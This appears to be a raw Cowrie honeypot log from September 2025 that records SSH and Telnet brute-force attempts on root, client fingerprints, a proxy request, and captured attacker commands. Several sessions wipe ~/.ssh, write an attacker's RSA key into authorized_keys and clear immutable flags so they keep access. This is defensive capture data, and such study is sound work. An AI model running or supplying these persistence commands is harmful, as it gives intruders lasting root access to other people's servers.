{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:02:55.433907Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:02:55.547640Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:02:55.548303Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:02:55.593754Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:02:55.594610Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11890,"dst_ip":"1.2.3.4","dst_port":22,"session":"eadb9d80cea5","protocol":"ssh","message":"New connection: 185.152.45.241:11890 (1.2.3.4:22) [session: eadb9d80cea5]","sensor":"my-vps","timestamp":"2025-09-09T03:02:55.642616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:02:55.643522Z","src_ip":"185.152.45.241","session":"eadb9d80cea5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:02:55.688327Z","src_ip":"185.152.45.241","session":"eadb9d80cea5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:02:56.128335Z","src_ip":"185.152.45.241","session":"eadb9d80cea5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:02:57.173914Z","src_ip":"185.152.45.241","session":"eadb9d80cea5"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11891,"dst_ip":"1.2.3.4","dst_port":22,"session":"28745c9ae22b","protocol":"ssh","message":"New connection: 185.152.45.241:11891 (1.2.3.4:22) [session: 28745c9ae22b]","sensor":"my-vps","timestamp":"2025-09-09T03:02:57.224000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:02:57.225215Z","src_ip":"185.152.45.241","session":"28745c9ae22b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:02:57.273362Z","src_ip":"185.152.45.241","session":"28745c9ae22b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:02:57.509189Z","src_ip":"185.152.45.241","session":"28745c9ae22b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:02:57.554341Z","src_ip":"185.152.45.241","session":"7eec796171d9"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:02:57.555393Z","src_ip":"185.152.45.241","session":"28745c9ae22b"}
{"eventid":"cowrie.session.closed","duration":12.820475101470947,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:03:02.564359Z","src_ip":"115.48.31.119","session":"8ea3e1784bc2"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16530,"dst_ip":"1.2.3.4","dst_port":23,"session":"f26c8793fb3f","protocol":"telnet","message":"New connection: 115.48.31.119:16530 (1.2.3.4:23) [session: f26c8793fb3f]","sensor":"my-vps","timestamp":"2025-09-09T03:03:02.772792Z"}
{"eventid":"cowrie.session.closed","duration":12.757241010665894,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:03:15.529966Z","src_ip":"115.48.31.119","session":"f26c8793fb3f"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16589,"dst_ip":"1.2.3.4","dst_port":23,"session":"cbadf23b1c22","protocol":"telnet","message":"New connection: 115.48.31.119:16589 (1.2.3.4:23) [session: cbadf23b1c22]","sensor":"my-vps","timestamp":"2025-09-09T03:03:15.679421Z"}
{"eventid":"cowrie.session.closed","duration":12.879549026489258,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:03:28.558857Z","src_ip":"115.48.31.119","session":"cbadf23b1c22"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16654,"dst_ip":"1.2.3.4","dst_port":23,"session":"c29a64f34e02","protocol":"telnet","message":"New connection: 115.48.31.119:16654 (1.2.3.4:23) [session: c29a64f34e02]","sensor":"my-vps","timestamp":"2025-09-09T03:03:28.825184Z"}
{"eventid":"cowrie.session.closed","duration":12.767293930053711,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:03:41.592413Z","src_ip":"115.48.31.119","session":"c29a64f34e02"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16716,"dst_ip":"1.2.3.4","dst_port":23,"session":"61955854a3c6","protocol":"telnet","message":"New connection: 115.48.31.119:16716 (1.2.3.4:23) [session: 61955854a3c6]","sensor":"my-vps","timestamp":"2025-09-09T03:03:41.722806Z"}
{"eventid":"cowrie.session.closed","duration":12.852051496505737,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:03:54.574705Z","src_ip":"115.48.31.119","session":"61955854a3c6"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16779,"dst_ip":"1.2.3.4","dst_port":23,"session":"f6d16691fdb7","protocol":"telnet","message":"New connection: 115.48.31.119:16779 (1.2.3.4:23) [session: f6d16691fdb7]","sensor":"my-vps","timestamp":"2025-09-09T03:03:54.753564Z"}
{"eventid":"cowrie.session.closed","duration":12.779203176498413,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:04:07.532698Z","src_ip":"115.48.31.119","session":"f6d16691fdb7"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16842,"dst_ip":"1.2.3.4","dst_port":23,"session":"b067af3d04ef","protocol":"telnet","message":"New connection: 115.48.31.119:16842 (1.2.3.4:23) [session: b067af3d04ef]","sensor":"my-vps","timestamp":"2025-09-09T03:04:07.742796Z"}
{"eventid":"cowrie.session.closed","duration":12.800226211547852,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:04:20.542956Z","src_ip":"115.48.31.119","session":"b067af3d04ef"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16901,"dst_ip":"1.2.3.4","dst_port":23,"session":"2272eeadab70","protocol":"telnet","message":"New connection: 115.48.31.119:16901 (1.2.3.4:23) [session: 2272eeadab70]","sensor":"my-vps","timestamp":"2025-09-09T03:04:20.693057Z"}
{"eventid":"cowrie.session.closed","duration":12.849951267242432,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:04:33.542920Z","src_ip":"115.48.31.119","session":"2272eeadab70"}
{"eventid":"cowrie.session.connect","src_ip":"115.48.31.119","src_port":16958,"dst_ip":"1.2.3.4","dst_port":23,"session":"d9797d2339fd","protocol":"telnet","message":"New connection: 115.48.31.119:16958 (1.2.3.4:23) [session: d9797d2339fd]","sensor":"my-vps","timestamp":"2025-09-09T03:04:33.699134Z"}
{"eventid":"cowrie.session.closed","duration":12.828283071517944,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:04:46.527327Z","src_ip":"115.48.31.119","session":"d9797d2339fd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61422,"dst_ip":"1.2.3.4","dst_port":22,"session":"9644a03f600f","protocol":"ssh","message":"New connection: 217.72.205.35:61422 (1.2.3.4:22) [session: 9644a03f600f]","sensor":"my-vps","timestamp":"2025-09-09T03:06:41.333718Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:06:41.334834Z","src_ip":"217.72.205.35","session":"9644a03f600f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51598,"dst_ip":"1.2.3.4","dst_port":23,"session":"27817a98eb71","protocol":"telnet","message":"New connection: 212.227.125.160:51598 (1.2.3.4:23) [session: 27817a98eb71]","sensor":"my-vps","timestamp":"2025-09-09T03:09:08.589699Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32910,"dst_ip":"1.2.3.4","dst_port":23,"session":"52357053c435","protocol":"telnet","message":"New connection: 212.227.125.160:32910 (1.2.3.4:23) [session: 52357053c435]","sensor":"my-vps","timestamp":"2025-09-09T03:09:23.044729Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":7781,"dst_ip":"1.2.3.4","dst_port":22,"session":"185d3c3a41c9","protocol":"ssh","message":"New connection: 212.227.125.160:7781 (1.2.3.4:22) [session: 185d3c3a41c9]","sensor":"my-vps","timestamp":"2025-09-09T03:10:02.995787Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:10:02.996963Z","src_ip":"212.227.125.160","session":"185d3c3a41c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":8057,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bab5b4c504e","protocol":"ssh","message":"New connection: 212.227.125.160:8057 (1.2.3.4:22) [session: 3bab5b4c504e]","sensor":"my-vps","timestamp":"2025-09-09T03:10:03.109424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:10:03.110624Z","src_ip":"212.227.125.160","session":"3bab5b4c504e"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T03:10:03.224933Z","src_ip":"212.227.125.160","session":"3bab5b4c504e"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:10:03.572573Z","src_ip":"212.227.125.160","session":"3bab5b4c504e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T03:10:03.688198Z","session":"3bab5b4c504e"}
{"eventid":"cowrie.session.connect","src_ip":"106.37.72.234","src_port":44550,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b5558de70d7","protocol":"ssh","message":"New connection: 106.37.72.234:44550 (1.2.3.4:22) [session: 2b5558de70d7]","sensor":"my-vps","timestamp":"2025-09-09T03:10:21.662735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:10:21.667744Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:10:21.862319Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.login.success","username":"root","password":"Asdfghj12","message":"login attempt [root/Asdfghj12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:10:22.649576Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.37.22","src_port":12176,"dst_ip":"1.2.3.4","dst_port":22,"session":"f79c97ed7de5","protocol":"ssh","message":"New connection: 49.247.37.22:12176 (1.2.3.4:22) [session: f79c97ed7de5]","sensor":"my-vps","timestamp":"2025-09-09T03:10:22.676488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:10:22.677923Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:10:22.962344Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:10:23.097956Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:10:23.098678Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:10:23.099765Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:10:23.304440Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:10:23.770712Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:10:23.771436Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:10:23.970019Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:10:23.971087Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.login.success","username":"root","password":"n0d0ubt1","message":"login attempt [root/n0d0ubt1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:10:24.156914Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:10:24.744098Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:10:24.744773Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:10:24.745789Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
